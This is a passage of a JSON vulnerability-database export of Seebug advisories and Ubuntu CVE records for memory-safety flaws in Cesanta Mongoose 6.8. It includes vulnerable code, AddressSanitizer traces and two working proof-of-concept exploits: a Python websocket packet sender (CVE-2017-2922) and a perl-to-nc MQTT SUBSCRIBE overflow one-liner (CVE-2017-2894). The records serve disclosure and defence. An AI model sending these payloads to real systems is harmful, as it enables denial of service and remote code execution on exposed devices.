arbitrary length value is used in pointer arithmetic and can cause out-of-bounds memory access. The vulnerability occurs in function `mg_mqtt_next_subscribe_topic`:\r\n```\r\nint mg_mqtt_next_subscribe_topic(struct mg_mqtt_message *msg,\r\n struct mg_str *topic, uint8_t *qos, int pos) {\r\n unsigned char *buf = (unsigned char *) msg->payload.p + pos;\r\n\r\n if ((size_t) pos >= msg->payload.len) {\r\n return -1;\r\n\r\n\r\n topic->len = buf[0] << 8 | buf[1]; [1]\r\n topic->p = (char *) buf + 2;\r\n *qos = buf[2 + topic->len]; [2]\r\n return pos + 2 + topic->len + 1;\r\n```\r\n\r\nIn the above code, at [1] two bytes from message buffer are read as `topic->len` and then immediatelly used at [2] to calculate offset to `qos`. No check is performed to insure it would be inside the bounds of the buffer which is limited in size. This issue can be triggered multiple times and with careful control of the memory layout could be abused to leak memory and cause denial of service.\r\n\r\nThe vulnerability can be triggered by sending the supplied proof of concept packet to the sample mqtt_broker application supplied with the library.\r\n\r\n### Crash Information\r\n```\r\nAddress Sanitizer output:\r\n==118728==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000014986 at pc 0x00000051e4c5 bp 0x7fffffffaf50 sp \r\n0x7fffffffaf48\r\nREAD of size 1 at 0x619000014986 thread T0\r\n #0 0x51e4c4 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\r\n #1 0x515174 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x515174)\r\n #2 0x4fa825 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fa825)\r\n #3 0x4fea17 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fea17)\r\n #4 0x50a8e7 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50a8e7)\r\n #5 0x50efa8 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50efa8)\r\n #6 0x4fc145 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fc145)\r\n #7 0x4eb5ea (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4eb5ea)\r\n #8 0x7ffff683882f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)\r\n #9 0x419978 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x419978)\r\n\r\n\r\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\r\nShadow bytes around the buggy address:\r\n 0x0c327fffa8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c327fffa930:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n ddressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07\r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n ==118728==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak(CVE-2017-2895)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2895"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96807", "id": "SSV:96807", "sourceData": "\n", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96807", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:39", "description": "### Summary\r\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It\u2019s HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nA websocket frame can be fragmented over multiple packets. Flags in the websocket header specify if the packet is fragmented and it\u2019s order. When encountering a first frame fragment, a buffer reallocation causes several pointers to become invalid, but the code doesn\u2019t invalidate or update them leading to potential use after free condition which can lead to further memory corruption.\r\n\r\nIn function `mg_deliver_websocket_data` responsible for parsing the websocket packet we observe the following code:\r\n```\r\n if (reass) { [1]\r\n /* On first fragmented frame, nullify size */\r\n if (mg_is_ws_first_fragment(wsm.flags)) { [2]\r\n mbuf_resize(&nc->recv_mbuf, nc->recv_mbuf.size + sizeof(*sizep)); [3]\r\n p[0] &= ~0x0f; /* Next frames will be treated as continuation */ [4]\r\n buf = p + 1 + sizeof(*sizep); [5]\r\n *sizep = 0; /* TODO(lsm): fix. this can stomp over frame data */ [6]\r\n }\r\n\r\n /* Append this frame to the reassembled buffer */ \r\n memmove(buf, wsm.data, e - wsm.data); [7]\r\n```\r\n\r\nIn the above code, if the packet is marked for reassembly (checked at [1]) and is first fragment (checked at [2]), receive buffer is resized at [3]. Function `mbuf_resize` actually calls `realloc` to resize the buffer. Calling `realloc` on a buffer to resize it doesn\u2019t guarantee that the same memory would be used, a different heap chunk can be chosen and original data would be copied there. This effectively makes old pointers - pointing to original buffer - invalid. In the above code, stale pointers are reused at [4],[5],[6] and [7] to do memory reads, writes and a memory copy. Pointers `p`, `buf`,`e`,sizep and wsm.dataare all initialized based on `originalnc->recv_mbuf` buffer at the beginning of the function:\r\n```\r\nstatic int mg_deliver_websocket_data(struct mg_connection *nc) {\r\n /* Using unsigned char *, cause of integer arithmetic below */\r\n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len,\r\n mask_len = 0, header_len = 0;\r\n unsigned char *p = (unsigned char *) nc->recv_mbuf.buf, *buf = p,\r\n *e = p + buf_len;\r\n```\r\n\r\nCalling `realloc` won\u2019t invalidate a pointer always but, in this case steps can be taken make that probability higher, like multiple simultaneous network connections. Not invalidating and updating pointers after `realloc` leads to a use after free condition which can be abused to cause denial of service and ultimately remote code execution.\r\n\r\n### Crash Information\r\n```\r\nAddress sanitizer output:\r\n\r\n==88299==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000005f80 at pc 0x00000051b1ee bp 0x7fffffffb490 sp \r\n0x7fffffffb488\r\nREAD of size 1 at 0x619000005f80 thread T0\r\n #0 0x51b1ed in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8874\r\n #1 0x51b1ed in ?? ??:0\r\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\r\n #3 0x5128d4 in ?? ??:0\r\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\r\n #5 0x4f9de6 in ?? ??:0\r\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\r\n #7 0x4fdcf9 in ?? ??:0\r\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\r\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\r\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\r\n #11 0x506603 in ?? ??:0\r\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #13 0x509dd8 in ?? ??:0\r\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #15 0x4fb695 in ?? ??:0\r\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\r\n #17 0x4ea65a in ?? ??:0\r\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n #19 0x7ffff6ee582f in ?? ??:0\r\n #20 0x418e58 in _start ??:?\r\n #21 0x418e58 in ?? ??:0\r\n\r\n\r\n0x619000005f80 is located 0 bytes inside of 1024-byte region [0x619000005f80,0x619000006380)\r\nfreed by thread T0 here:\r\n #0 0x4b9308 in realloc ??:?\r\n #1 0x4b9308 in ?? ??:0\r\n #2 0x4f0275 in mbuf_resize /home/user/mongoose/examples/websocket_chat/../../mongoose.c:1044 (discriminator 1)\r\n #3 0x4f0275 in ?? ??:0\r\n\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x4b8f88 in __interceptor_malloc ??:?\r\n #1 0x4b8f88 in ?? ??:0\r\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\r\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\r\n #4 0x506453 in ?? ??:0\r\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #6 0x509dd8 in ?? ??:0\r\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #8 0x4fb695 in ?? ??:0\r\n #4 0x60200000efef (<unknown module>)\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51b1ed)\r\nShadow bytes around the buggy address:\r\n0x0c327fff8ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8bd0: 04 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c327fff8bf0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\nAddressable: 00\r\nPartially addressable: 01 02 03 04 05 06 07\r\nHeap left redzone: fa\r\nHeap right redzone: fb\r\nFreed heap region: fd\r\nStack left redzone: f1\r\nStack mid redzone: f2\r\nStack right redzone: f3\r\nStack partial redzone: f4\r\nStack after return: f5\r\nStack use after scope: f8\r\nGlobal redzone: f9\r\nGlobal init order: f6\r\nPoisoned by user: f7\r\nContainer overflow: fc\r\nArray cookie: ac\r\nIntra object redzone: bb\r\nASan internal: fe\r\nLeft alloca redzone: ca\r\nRight alloca redzone: cb\r\n==88299==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability(CVE-2017-2922)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2922"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96811", "id": "SSV:96811", "sourceData": "\n import socket\r\nimport random\r\nimport struct\r\nimport sys\r\nhttp_upgrade = ('GET /chat HTTP/1.1\\r\\n'\r\n 'Host: server.example.com\\r\\n'\r\n 'Upgrade: websocket\\r\\n'\r\n 'Connection: Upgrade\\r\\n'\r\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\r\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\r\n 'Sec-WebSocket-Version: 13\\r\\n'\r\n 'Origin: http://example.com\\r\\n\\r\\n')\r\n\r\n\r\npayload = \"\\x01\" # need to pass two checks:\r\n\"\"\"\r\nstatic int mg_is_ws_fragment(unsigned char flags) {\r\nreturn (flags & 0x80) == 0 || (flags & 0x0f) == 0;\r\n}\r\n\r\n\r\nstatic int mg_is_ws_first_fragment(unsigned char flags) {\r\nreturn (flags & 0x80) == 0 && (flags & 0x0f) != 0;\r\n}\r\npayload += chr(0x00 | 50 ) # packet doesn't have to be masked, so we can ommit it, size doesn't matter\r\npayload += \"A\"*(60+ random.randint(0,20000)) # rest of the packet doesn't matter\r\n\"\"\"\r\nappend random length of garbage so it's a bit easier to trigger the realloc when runing without ASAN ,\r\nvalgrind, or libdislocator, otherwise ~60 is enough\r\n\"\"\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1],int(sys.argv[2])))\r\ns.send(http_upgrade)\r\nprint s.recv(1024)\r\ns.send(payload)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96811", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:41", "description": "### Summary\r\nAn exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-121: Stack-based Buffer Overflow\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nMQTT SUBSCRIBE command packet can contain multiple topics to subscribe to. If a MQTT SUBSCRIBE packet with upwards of 512 topic subscriptions is sent to the server, an overflow of a stack buffer can lead to an overwrite of adjacent variables or the return address ultimately leading to remote code execution. In function `mg_mqtt_broker_handle_subscribe` topics are handled one by one:\r\n```\r\nuint8_t qoss[512]; [1]\r\n size_t qoss_len = 0;\r\n struct mg_str topic;\r\n uint8_t qos;\r\n int pos;\r\n struct mg_mqtt_topic_expression *te;\r\n\r\n for (pos = 0;\r\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\r\n qoss[qoss_len++] = qos; [2]\r\n```\r\n\r\nIn the above code, an array of 512 bytes is allocated at [1]. Then, in a for loop at [2] the QOS value is stored inside that buffer and an index is incremented. No check to make sure that `qoss_len` doesn\u2019t overflow is present, so a SUBSCRIBE with more than 512 subscriptions will overflow the array and write past it corrupting the stack frame.\r\n\r\nThis vulnerability can be triggered by running the supplied proof of concept to the sample `mqtt_broker` application supplied with the library.\r\n\r\n### Crash Information\r\n```\r\nAddress Sanitizer output:\r\n\r\n==120239==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb2d0 at pc 0x00000051c985 bp 0x7fffffffaff0 sp \r\n0x7fffffffafe8\r\nWRITE of size 1 at 0x7fffffffb2d0 thread T0\r\n#0 0x51c984 in mg_mqtt_broker_handle_subscribe /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10031\r\n#1 0x51c984 in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10112\r\n#2 0x51c984 in ?? ??:0\r\n#3 0x513e76 in mqtt_handler /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:9701\r\n#4 0x513e76 in ?? ??:0\r\n#5 0x4fa245 in mg_call /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2051\r\n#6 0x4fa245 in ?? ??:0\r\n#7 0x4fe437 in mg_recv_common /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2502\r\n#8 0x4fe437 in ?? ??:0\r\n#9 0x50a307 in mg_if_recv_tcp_cb /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2506\r\n#10 0x50a307 in mg_handle_tcp_read /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3372\r\n#11 0x50a307 in mg_mgr_handle_conn /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3497\r\n#12 0x50a307 in ?? ??:0\r\n#13 0x50e9c8 in mg_socket_if_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3690\r\n#14 0x50e9c8 in ?? ??:0\r\n#15 0x4fbb65 in mg_mgr_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2232\r\n#16 0x4fbb65 in ?? ??:0\r\n#17 0x4eaffa in main /home/user/mongoose/examples/mqtt_broker/mqtt_broker.c:43\r\n#18 0x4eaffa in ?? ??:0\r\n#19 0x7ffff683882f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n#20 0x7ffff683882f in ?? ??:0\r\n#21 0x419848 in _start ??:?\r\n#22 0x419848 in ?? ??:0\r\n\r\n\r\nAddress 0x7fffffffb2d0 is located in stack of thread T0 at offset 720 in frame\r\n#0 0x51c61f in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10093\r\n#1 0x51c61f in ?? ??:0\r\nThis frame has 3 object(s):\r\n[32, 132) 'buf.i'\r\n[176, 184) 'p.i'\r\n[208, 720) 'qoss.i' <== Memory access at offset 720 overflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51c984)\r\nShadow bytes around the buggy address:\r\n 0x10007fff7600: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7610: 04 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00 00\r\n 0x10007fff7620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x10007fff7650: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3\r\n 0x10007fff7660: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7680: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00\r\n 0x10007fff7690: 00 00 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3\r\n 0x10007fff76a0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07\r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==120239==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-31 - Vendor Disclosure\r\n* 2017-10-30 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution(CVE-2017-2894)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2894"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96806", "id": "SSV:96806", "sourceData": "\n perl -e 'print \"\\x80\\xff\\x0f\" . \"\\x00\\x00\\x00\\x01a\\x02\\x00\"x400 ' | nc\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96806", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:55:15", "description": "An exploitable memory corruption vulnerability exists in the Websocket\nprotocol implementation of Cesanta Mongoose 6.8. A specially crafted\nwebsocket packet can cause an integer overflow, leading to a heap buffer\noverflow and resulting in denial of service and potential remote code\nexecution. An attacker needs to send a specially crafted websocket packet\nover network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2921", "href": "https://ubuntu.com/security/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An exploitable use-after-free vulnerability exists in the HTTP server\nimplementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with\na CGI target can cause a reuse of previously freed pointer potentially\nresulting in remote code execution. An attacker needs to send this HTTP\nrequest over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2891", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2891", "href": "https://ubuntu.com/security/CVE-2017-2891", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An infinite loop programming error exists in the DNS server functionality\nof Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause\nan infinite loop resulting in high CPU usage and Denial Of Service. An\nattacker can send a packet over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2909", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2909", "href": "https://ubuntu.com/security/CVE-2017-2909", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-08-04T13:55:16", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. A specially crafted\nMQTT packet can cause an arbitrary out-of-bounds memory read and write\npotentially resulting in information disclosure, denial of service and\nremote code execution. An attacker needs to send a specially crafted MQTT\npacket over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2892", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2892", "href": "https://ubuntu.com/security/CVE-2017-2892", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:16", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE\npacket can cause a NULL pointer dereference leading to server crash and\ndenial of service. An attacker needs to send a specially crafted MQTT\npacket over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecastugs:\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 